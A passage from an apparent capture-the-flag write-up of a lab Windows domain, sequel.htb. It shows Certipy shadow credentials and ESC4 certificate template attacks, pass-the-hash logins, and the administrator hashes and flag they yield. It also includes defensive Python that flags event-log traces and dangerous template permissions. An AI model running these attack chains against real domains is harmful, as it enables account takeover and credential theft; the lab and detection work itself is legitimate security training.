AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUbMIIFF6ADAgESoQMCAQKiggUJBIIFBYkhmYC1u2g9
ZvO20ZySRbhJBWO/uRDyewdiY40aKLnz0nv/u5Qsr/1QY5qxbuaJY0arbDjzt5csJWEP1m+mtFOVcUk+
wbyOxjewmQDJ+YzWyLFpfFrL3D40EQC/jwLWJ6ohk6+55k3sOX8IWT953knVC/xaCg2jz6zxzw7Etun/
AgJvHXpxFipRYY1VzFr9F5jzQUnySBTgtjSbg1cwHW/awtEKQjDnF3XW6HRFTYi4xawQ99cvByOdEd20
qLZHCu7jdeb+M3ykR9kbgicwx79hFsUPNWAzcLaTWe1CwCSFhuWF/GEGaOTIr1Srej+MAVRxXMKGpNNB
+9636/+d0pQCEk9OHw648AjGnCuhTSofBdpjK8Up7lYUdpYARA+MIFszlUbWJOUzkSvvXA7LRoVyKVsv
p6iHZBmAESYFPDTaU3SDykun0XxKq50Ddcjkf/Nc8BsSosCLuc/3YP/nvOiIOu8TDI9ZsENjrNx7Xjtx
VAoj8rHihHQOVzGPKW0gchpmb8LI0ataa1Qmp8a8+PEAVmsQd/MsLdE7RYn/bhexgFAirLO1/qE+atAb
olPY6qHXyQ6CcrnnZ3GDyzkkdC4I/w2lXr6O+vf4kEWZOs/eERiLv0eVBAPUY1TuCnwbg995GLQUcdAc
OSmASi5NhoPkTLkvzkBloHrfgR1RumGXxk+kv08Tiy6wKhC207Ryeqztl1U9WX6Ze35Ri2vZ9kbL+dPH
IZIdqYFw/g3WWZ1BKubZL7NREavTU7rAHV6MXV4mrRMqBODkKRXzPTMI+BCy2UtjuQJ4emVF3F9STSc0
yUBz4+23WbIPKj8gC+LCfQO/LThmrf7zrmpABw4zKu6Mvq7fpSiKmlYwXxib+Y/MEVF8lP9J+bEA0RIU
DBMPBB+AePePCHfMgF+CFtvE13CIZFptVkM1BTvUWZHxE5zp7Mcx35wBXU3OZJOAYj/dzRJiQl53YFAH
HtoCJOZqYAkTlgfNMfgLlYfUcRsgUjveB8eewDDk5BtP1ETftb/lngOJw04A8Pf4Rt2MJbsOcxokViQQ
ViuGOMwhTe0WD3OjC7LkOIIrZycQK+KDI3fD7EVjf36P+hysu5PUFWRIF2lDWuCt0wOaFiRGkGx/ZO5v
emGTyeIfz8vq7u8YZntmca7+ygL4PkgI1QFcw6WMufjDIVH/FEluO1UK53zH2vWgzQzZ6pV6kJCLa3VT
Ai8tNaQJuMjo4eSgLr4u+dIIlcCAhnkrK0QJ7cd8AVc//LHd0nTGfeJE0jBn641+rI0WI0U1ub8NwfyI
EVkFZ1M2MALVAlh+IXy4vnpvdIp2h5pdLb9dB1Zt6fX9v6lCPRKJSf6vtbbOnDNff4qGd8p+9LAa58Em
3byczkJBGkyWpwcmJ2UchJwZc56c9SqPoPz3zES7G6Pb4D4kt5tjaVVWqJ/cP7rCxKcQcFTiiUGiv56F
NsaQhWf54b+lAqRSuBH4FnSrhgGgNUA4TPoq3/vICOpw0RC3hnFECCsDZVLiIKTJOHI+V4knuPodWsGE
+j999Qii1sDyxR+7/OO5jqSSEbWiUUxEFnG9x9nQFJi0m5Q9HfQ6MzanVoVHQKR1GW9LcGjbNJ1naqnE
QRD+/gp9SdmBspnDHecIP4rPpbdsLFKbfUWR/7b8HIb00YsL6+e3ZJCl/X9Beu8dMAGP3OSl13iW8346
Fm1EQchEvXn/RTxXQ5EZqAmjgc4wgcugAwIBAKKBwwSBwH2BvTCBuqCBtzCBtDCBsaAbMBmgAwIBF6ES
BBCWjz/GXALJ7+1QaZfFZsTIoQwbClNFUVVFTC5IVEKiEzARoAMCAQGhCjAIGwZjYV9zdmOjBwMFAEDh
AAClERgPMjAyNTAxMTEyMjQxMjFaphEYDzIwMjUwMTEyMDg0MTIxWqcRGA8yMDI1MDExODIyNDEyMVqo
DBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : ca_svc
UserRealm : SEQUEL.HTB
StartTime : 1/11/2025 2:41:21 PM
EndTime : 1/12/2025 12:41:21 AM
RenewTill : 1/18/2025 2:41:21 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : lo8/xlwCye/tUGmXxWbEyA==
ASREP (key) : 97A5B84E9E715B3F8C0C2EAB6E56DBCB
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3B181B914E7A9D5508EA1E20BC2B7FCE
Note from later in the box: a typo in the domain name is what broke the whole shadow credentials attack from outside.... sooo.... yeah. It's sequel, not sequal!
└─$ certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -target sequel.htb -dc-ip 10.129.164.144
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '105debfa-0570-7a0f-d577-cfb215902484'
[*] Adding Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
Success
└─$ netexec smb 10.129.221.78 -u 'ca_svc' -H '3B181B914E7A9D5508EA1E20BC2B7FCE'
SMB 10.129.221.78 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.221.78 445 DC01 [+] sequel.htb\ca_svc:3B181B914E7A9D5508EA1E20BC2B7FCE
Note: don't reset the password with any of the commands above; use the shadow credentials attack instead, which recovers the NT hash while the original password stays unchanged for the rest of the box.
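The ryan to ca_svc step above (owner change, DACL change, then either a password reset or a key credential written with PowerView, bloodyAD, Whisker or Certipy) leaves a distinctive trail in the domain controller's Security log. As an added detection example (my code, not the writeup's), the function below triages Windows events 5136 (directory service object modified) and 4724 (password reset attempt) from a constructed sample shaped after that sequence; the allow-list of expected writers and the sample event values are assumptions.

```python
from collections import Counter

# Attribute writes (Security event 5136) that warrant review when the writer is
# not one of the subjects expected to perform them.
SENSITIVE_ATTRIBUTES = {
    "msDS-KeyCredentialLink": "key credential written to the account (shadow credentials)",
    "nTSecurityDescriptor": "owner or DACL of the account changed",
}
# Constructed allow-list for this domain; in practice derive it from the
# admins and automation that legitimately provision keys or ACLs.
ALLOWED_SUBJECTS = {"Administrator", "DC01$"}


def triage(events, allowed=ALLOWED_SUBJECTS):
    """One finding per suspicious 5136 / 4724 event, in the order seen."""
    findings = []
    for ev in events:
        subject = ev.get("SubjectUserName", "")
        if subject in allowed:
            continue
        if ev["EventID"] == 5136:
            attr = ev.get("AttributeLDAPDisplayName")
            if attr in SENSITIVE_ATTRIBUTES:
                # OperationType renders as "Value Added" / "Value Deleted"; the
                # delete is the tool restoring the old value once it has the hash,
                # so it is kept as evidence rather than filtered out.
                findings.append({
                    "event_id": 5136, "subject": subject, "object": ev["ObjectDN"],
                    "attribute": attr, "op": ev.get("OperationType"),
                    "why": SENSITIVE_ATTRIBUTES[attr],
                })
        elif ev["EventID"] == 4724:
            findings.append({
                "event_id": 4724, "subject": subject, "object": ev["TargetUserName"],
                "attribute": None, "op": "password reset",
                "why": "password reset by a principal outside the allow-list",
            })
    return findings


def by_subject(findings):
    """Count findings per subject: one account doing an ACL write, a key
    credential write and a reset in a short window is the chain, not noise."""
    return Counter(f["subject"] for f in findings)


# Constructed sample events carrying the 5136 / 4724 fields this code reads,
# mirroring the sequence in this writeup (ACL change, key credential, reset, cleanup).
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=Ryan Howard,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "ryan",
     "ObjectDN": "CN=Certification Authority,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "ryan",
     "ObjectDN": "CN=Certification Authority,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 4724, "SubjectUserName": "ryan", "TargetUserName": "ca_svc"},
    {"EventID": 5136, "SubjectUserName": "ryan",
     "ObjectDN": "CN=Certification Authority,CN=Users,DC=sequel,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Deleted"},
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['event_id']} {f['subject']:<14} {f['op']:<14} {f['object']}  # {f['why']}")
    print(dict(by_subject(hits)))
```

Event 5136 is only written when the "Audit Directory Service Changes" subcategory is enabled and the user objects carry a SACL covering property writes; without that, the key credential write leaves no 5136 at all, and only the 4724 from the fallback password reset remains visible.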
Privilege Escalation (Administrator)
ESC4
└─$ certipy-ad find -vulnerable -u 'ca_svc@sequal.htb' -hashes '3B181B914E7A9D5508EA1E20BC2B7FCE' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: [Errno 113] No route to host
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (10.129.228.253:445)] [Errno 113] No route to host
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[!] Got error while trying to check for web enrollment: [Errno 113] No route to host
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
https://github.com/ly4k/Certipy?tab=readme-ov-file#esc4
https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4
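Certipy's ESC4 finding boils down to an ACL check: a principal that is not a CA or domain admin holds a right over the template object that lets it rewrite the template definition. As an added example (my code, not Certipy's and not the writeup's), the audit below encodes that check over a template dict transcribed from the enumeration output above, and goes one step further than the page by also reporting the ESC1 state a template ends up in after such a rewrite (enrollee supplies subject, low-privileged enrollment). The allow-list of privileged principals and the "rewritten" template are assumptions.

```python
import copy

# Constructed allow-list: principals that are expected to control templates.
PRIVILEGED = {
    "SEQUEL.HTB\\Domain Admins",
    "SEQUEL.HTB\\Enterprise Admins",
    "SEQUEL.HTB\\Administrator",
}
# Any one of these rights lets the holder change the template definition (ESC4).
CONTROL_RIGHTS = ("Owner", "Full Control Principals", "Write Owner Principals",
                  "Write Dacl Principals", "Write Property Principals")


def _as_list(value):
    """Certipy prints a single principal as a string and several as a list."""
    return [value] if isinstance(value, str) else list(value or [])


def audit_template(tpl, privileged=PRIVILEGED):
    """Return one finding per (principal, right) that is dangerous; [] means clean."""
    findings = []
    name = tpl["Template Name"]
    ctrl = tpl["Permissions"]["Object Control Permissions"]
    for right in CONTROL_RIGHTS:
        for principal in _as_list(ctrl.get(right)):
            if principal not in privileged:
                findings.append({"template": name, "issue": "ESC4",
                                 "principal": principal, "right": right})
    # ESC1: a low-privileged enroller may pick the subject (any UPN) on an enabled
    # template usable for client authentication with no manager approval.
    enrollers = _as_list(tpl["Permissions"]["Enrollment Permissions"].get("Enrollment Rights"))
    low_priv = [p for p in enrollers if p not in privileged]
    if (tpl["Enabled"] and tpl["Enrollee Supplies Subject"] and tpl["Client Authentication"]
            and not tpl["Requires Manager Approval"]):
        for principal in low_priv:
            findings.append({"template": name, "issue": "ESC1",
                             "principal": principal, "right": "Enrollment Rights"})
    return findings


# Transcribed from the Certipy enumeration output above.
DUNDER = {
    "Template Name": "DunderMifflinAuthentication",
    "Enabled": True,
    "Client Authentication": True,
    "Enrollee Supplies Subject": False,
    "Requires Manager Approval": False,
    "Permissions": {
        "Enrollment Permissions": {
            "Enrollment Rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"],
        },
        "Object Control Permissions": {
            "Owner": "SEQUEL.HTB\\Enterprise Admins",
            "Full Control Principals": ["SEQUEL.HTB\\Cert Publishers"],
            "Write Owner Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins",
                                       "SEQUEL.HTB\\Administrator", "SEQUEL.HTB\\Cert Publishers"],
            "Write Dacl Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins",
                                      "SEQUEL.HTB\\Administrator", "SEQUEL.HTB\\Cert Publishers"],
            "Write Property Principals": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins",
                                          "SEQUEL.HTB\\Administrator", "SEQUEL.HTB\\Cert Publishers"],
        },
    },
}


def rewritten_template():
    """Constructed: the same template after a holder of Write Property has made it
    enrollee-supplies-subject and enrollable by all authenticated users. A second
    audit run then reports ESC1 on top of the ESC4 rights, which is the signal to
    restore the saved configuration (the -save-old JSON above)."""
    t = copy.deepcopy(DUNDER)
    t["Enrollee Supplies Subject"] = True
    t["Permissions"]["Enrollment Permissions"]["Enrollment Rights"] = ["SEQUEL.HTB\\Authenticated Users"]
    return t


if __name__ == "__main__":
    for tpl in (DUNDER, rewritten_template()):
        for f in audit_template(tpl):
            print(f"{f['issue']}  {f['template']}: {f['principal']} has {f['right']}")
```

Run periodically against a dump of every template (Certipy's `-json` output or your own LDAP query of the pKICertificateTemplate objects) and diff the findings; the fix for this box's case is to take Cert Publishers out of the template's DACL, not to tweak the template fields.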
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequal.htb -template DunderMifflinAuthentication -upn administrator@sequal.htb -timeout 1000
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequal.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequal.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequal.htb
[*] Trying to get TGT...
[-] Wrong domain name specified 'sequal.htb'
[-] Verify that the domain 'sequal.htb' matches the certificate UPN: administrator@sequal.htb
auth fails again, apparently because of Kerberos...
Skill issue 💀 It should have been sequel, not sequal....
└─$ certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -timeout 100
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
Root.txt
└─$ evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f343878d88bc4ccec915441b7a779c6d